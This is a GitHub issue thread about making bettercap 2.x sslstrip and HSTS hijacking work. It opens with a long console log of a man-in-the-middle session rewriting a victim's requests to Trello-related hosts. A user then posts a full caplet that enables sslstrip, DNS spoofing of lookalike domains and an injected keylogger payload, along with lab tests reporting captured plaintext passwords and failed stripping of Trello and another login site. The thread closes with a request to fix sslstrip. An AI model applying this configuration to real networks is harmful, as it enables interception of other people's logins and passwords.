 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.533785002 +0200 CEST m=+49.517895121 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35442
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.640272853 +0200 CEST m=+49.624382979 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35438
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.650485802 +0200 CEST m=+49.634595927 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.679457045 +0200 CEST m=+49.663567176 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.697106451 +0200 CEST m=+49.681216579 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.713496188 +0200 CEST m=+49.697606266 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.792647264 +0200 CEST m=+49.776757365 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35444
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:22.806818774 +0200 CEST m=+49.790928871 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-sm...
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.852119651 +0200 CEST m=+49.836229741 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-sma...
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:22] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:22.974170547 +0200 CEST m=+49.958280793 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.016759304 +0200 CEST m=+50.000869417 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35440
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.035211077 +0200 CEST m=+50.019321185 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.065003064 +0200 CEST m=+50.049113182 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/02b80d97c3394f2fc3b0c753bd156c9b/cookiec.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.125486674 +0200 CEST m=+50.109596750 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/096a222ccf04c0ac8ba7d4de4fa42406/googleAnalytics.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35442
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.170989496 +0200 CEST m=+50.155099615 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.212481612 +0200 CEST m=+50.196591741 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.221784239 +0200 CEST m=+50.205894354 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.287515066 +0200 CEST m=+50.271625172 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.315996791 +0200 CEST m=+50.300106908 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.351806557 +0200 CEST m=+50.335916684 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/baea605d19ee1e1df56bbee0b9fbb84b/googleTagManager.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.392021081 +0200 CEST m=+50.376131183 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/8215f6659adc202403198fef903a447e/sign-in-with-google.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.429655737 +0200 CEST m=+50.413765826 {12.0.0.5 GET fonts.gstatic.com /s/roboto/v19/KFOmCnqEu92Fr1Mu4mxK.woff2 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/analytics/f822f0dbdc0e029ded2c8266ab726cc8/snowplow.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : e6653.f.akamaiedge.net is 92.122.81.50
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.44354394 +0200 CEST m=+50.427654074 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/8215f6659adc202403198fef903a447e/sign-in-with-google.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/67806f9ff1ce059372fafdc52c3073c2/jquery.min.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.467563396 +0200 CEST m=+50.451673521 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.507866539 +0200 CEST m=+50.491976667 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.57217065 +0200 CEST m=+50.556280730 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.630952285 +0200 CEST m=+50.615062373 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35438
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.701365333 +0200 CEST m=+50.685475469 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js 45925}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35446
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.725535278 +0200 CEST m=+50.709645444 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.753385818 +0200 CEST m=+50.737495930 { GET fonts.gstatic.com /s/roboto/v19/KFOmCnqEu92Fr1Mu4mxK.woff2 15736}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [sys.log] [inf] [sslstrip] Replacing host wwww.d2k1ftgv7pobq7.cloudfront.net with d2k1ftgv7pobq7.cloudfront.net in request from 12.0.0.5:35438
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:23.770847458 +0200 CEST m=+50.754957569 {12.0.0.5 GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.767694429 +0200 CEST m=+50.751804536 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:23.802078068 +0200 CEST m=+50.786188201 { GET d2k1ftgv7pobq7.cloudfront.net /meta/c/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-small.svg 5109}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : gstaticadssl.l.google.com is 172.217.16.227
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/images/8215f6659adc202403198fef903a447e/sign-in-with-google.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : gstaticadssl.l.google.com is 2a00:1450:4003:803::2003
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET fonts.gstatic.com/s/roboto/v19/KFOmCnqEu92Fr1Mu4mxK.woff2
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/images/3a15a346421a08419648c0ca2f5e98b2/caret.svg
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/js/7bfd6805d8ea4ba0af0b447380968ec0/languagePicker.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (2.1 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/images/e4e8fa01ba058bce8e9f2bb7459516f9/atlassian-logo-white-sm...
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.request] http 12.0.0.5 GET wwww.d2k1ftgv7pobq7.cloudfront.net/meta/c/p/res/images/6cdbcb3dcf82bba860f1768d184161ee/atlassian-logo-gray-sma...
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 172.217.16.227:80 200 OK -> 12.0.0.5 (3.4 kB font/woff2)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:23] [net.sniff.http.response] http 54.192.62.238:80 403 Forbidden -> 12.0.0.5 (3.3 kB text/html)
 12.0.0.0/24 > 12.0.0.4  » [08:13:28] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:28.301259177 +0200 CEST m=+55.285369428 {12.0.0.5 GET use.typekit.net /dpl7tbg.js 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:28] [net.sniff.http.request] http 12.0.0.5 GET use.typekit.net/dpl7tbg.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:28] [net.sniff.dns] dns 8.8.8.8 > 12.0.0.5 : e6653.f.akamaiedge.net is 92.122.81.50
 12.0.0.0/24 > 12.0.0.4  » [08:13:29] [sys.log] [inf] [sslstrip] Stripping 3 SSL links from use.typekit.net
 12.0.0.0/24 > 12.0.0.4  » [08:13:29] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:29.491671714 +0200 CEST m=+56.475781920 { GET use.typekit.net /dpl7tbg.js 64602}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:29] [net.sniff.http.response] http 92.122.81.50:80 200 OK -> 12.0.0.5 (3.4 kB text/javascript;charset=utf-8)
 12.0.0.0/24 > 12.0.0.4  » [08:13:29] [http.proxy.spoofed-request] {http.proxy.spoofed-request 2019-04-22 08:13:29.57926675 +0200 CEST m=+56.563376866 {12.0.0.5 GET trello.com /favicon.ico 0}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:29] [sys.log] [inf] [sslstrip] Stripping 3 SSL links from use.typekit.net
 12.0.0.0/24 > 12.0.0.4  » [08:13:30] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:30.006732182 +0200 CEST m=+56.990842277 {12.0.0.5 GET use.typekit.net /dpl7tbg.js 64602}}
 12.0.0.0/24 > 12.0.0.4  » [08:13:30] [net.sniff.http.request] http 12.0.0.5 GET use.typekit.net/dpl7tbg.js
 12.0.0.0/24 > 12.0.0.4  » [08:13:30] [net.sniff.http.response] http 92.122.81.50:80 200 OK -> 12.0.0.5 (3.4 kB text/javascript;charset=utf-8)
 12.0.0.0/24 > 12.0.0.4  » [08:13:30] [http.proxy.spoofed-response] {http.proxy.spoofed-response 2019-04-22 08:13:30.076870424 +0200 CEST m=+57.060980537 { GET trello.com /favicon.ico 108167}}
 12.0.0.0/24 > 12.0.0.4  » exit
 WARNING: Stopping module dns.spoof timed out.
 

Am I missing something that causes this error?. Could you help to complete this PoC?

Regards.

@OscarAkaElvis
Copy link
Author

OscarAkaElvis commented May 15, 2019

Hi, I did some tests... same point as @JBalanza . I'm not able to make sslstrip to work in trello.com webpage. I tried same configuration without using airgeddon and I got same spot. I re-tested trello.com on Bettercap 1.x to be sure that anything changed in that page and to know if it is still "sslstripable"... and yes, it is... working again on bettercap 1.x. The proof again:

trello_1x_working

So... I decided to test Bettercap 2.x with a new targets. I chosen this non-HSTS webpage: onlineprep.act.org/login

First tested using bettercap 1.x and it worked of course:

onlineprep act org

So, I decided to set up an environment to test bettercap 2.x sslstrip deeply.

Environment:

Tested without using airgeddon. Just using two Linux machines. Attacker (Kali) with routing enabled and victim (Parrot) setting attacker as gateway (no arp-spoofing to remove as much as possible chaos agents here). Surfing is working ok from the victim through the attacker. Latest Bettercap version used from Kali repo: v2.24 (built for linux amd64 with go1.11.6)

Tests done:

  • Test1. Plain text passwords capturing on this non-ssl http://login.ebiquity.com/ webpage <- working
  • Test2. Trello page <- failed
  • Test3. New onlineprep.act.org target <- failed

All tests were using a pretty similar than @JBalanza caplet config file. This:

set hstshijack.log             /root/Desktop/bettercaplog.log
set hstshijack.payload         /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set hstshijack.ignore          *
set hstshijack.targets         *.com, *.es, *.net, *.org
set hstshijack.replacements    *.corn, *.ex, *.met, *.ogr
set hstshijack.obfuscate       true
set hstshijack.encode          false

set hstshijack.custompayloads  *:,/usr/share/bettercap/caplets/hstshijack/payloads/sslstrip.js,*:/usr/share/bettercap/caplets/hstshijack/payloads/keylogger.js

set http.proxy.script     /usr/share/bettercap/caplets/hstshijack/hstshijack.js
set http.proxy.port       8200
set http.proxy.sslstrip   true
set net.sniff.filter      not (arp or port 5353)
set net.sniff.verbose     false

set dns.spoof.domains     *.corn, *.ex, *.met, *.ogr

http.proxy  on
dns.spoof   on
net.sniff   on
events.stream off
events.stream on

Test1 results (Plain text passwords capturing) working:

Plain text password was captured successfully

plain

Test2 results (sslstrip on trello.com) failed:

Trello domain is spoofed (to trello.corn as is set up in caplet config file), but the page is not able to load all its resources as you can see in next image. Blank page after clicking on Login button.

trello1

Test3 results (sslstrip on onlineprep.act.org) failed:

For some reason, typing "onlineprep.act.org/login" on browser's victim is redirected to "wwww.onlineprep.act.ogr/login". So, the .org domain is well spoofed to .ogr domain but, why the hell is adding wwww before? That is what is making it to fail...

error

The data from the Bettercap's console on next image:

dns

After this failed redirect... if the victim manually remove wwww from the url while keeping the spoofed domain (ogr instead of org) letting it as "http://onlineprep.act.ogr/login", it reaches the right page hoping to get the pass but after sending it... the pass is not captured 😢

image

And the bettercap console... password not shown...

image

Conclusions:

  • I wasn't able to make sslstrip to work on any page.
  • Bettercap 1.x sslstrip works much better than this.
  • Regardless of how difficult it is to integrate it, we will not be able to do it as long as there is not a version of bettercap 2.x that works correctly regarding sslstrip.

Please @evilsocket , refactor is needed! I saw that you are focused now on new bettercap features like wireless stuff... but, what about this? IMO is one of the best features! Bettercap can be again the best tool if you fix this! Take it into consideration. Thank you.

@buffermet
Copy link
Member

buffermet commented May 18, 2019

@JBalanza

I performed the scenario as we talked (without airgeddon): two VM with full visibility between them and one being the spoofer (with bettercap v2.23) acting as a gateway with forwarding enabled and other being the victim. We are going to call them 'spoofer' and 'victim' devices.

